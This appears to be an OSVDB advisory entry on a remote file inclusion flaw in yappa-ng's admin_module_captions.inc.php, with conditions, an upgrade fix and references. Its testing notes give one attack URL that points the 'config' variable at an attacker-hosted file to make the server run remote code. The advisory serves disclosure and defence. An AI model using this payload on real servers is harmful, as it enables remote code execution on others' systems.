yappa-ng admin_module_captions.inc.php config Variable Remote File Inclusion

2005-05-11T05:23:07
ID OSVDB:16549
Type osvdb
Reporter James Bercegay()
Modified 2005-05-11T05:23:07

Description

Vulnerability Description

yappa-ng contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin_module_captions.inc.php script not properly sanitizing user input supplied to the 'config' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

Globals must be set to 'on' and there can't be any include restrictions for this vulnerability to be present.

Solution Description

Upgrade to version 2.3.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

yappa-ng contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin_module_captions.inc.php script not properly sanitizing user input supplied to the 'config' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[victim]/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://[attacker]/

References:

Vendor URL: http://sourceforge.net/projects/yappa-ng/ Vendor Specific Solution URL: https://sourceforge.net/project/showfiles.php?group_id=70802 Vendor Specific News/Changelog Entry: https://sourceforge.net/project/shownotes.php?release_id=323206 Related OSVDB ID: 16558 Related OSVDB ID: 16559 Related OSVDB ID: 16563 Related OSVDB ID: 16562 Related OSVDB ID: 16554 Related OSVDB ID: 16557 Related OSVDB ID: 16550 Related OSVDB ID: 16551 Related OSVDB ID: 16552 Related OSVDB ID: 16553 Related OSVDB ID: 16555 Related OSVDB ID: 16556 Related OSVDB ID: 16560 Related OSVDB ID: 16561 Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00074-05112005 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0141.html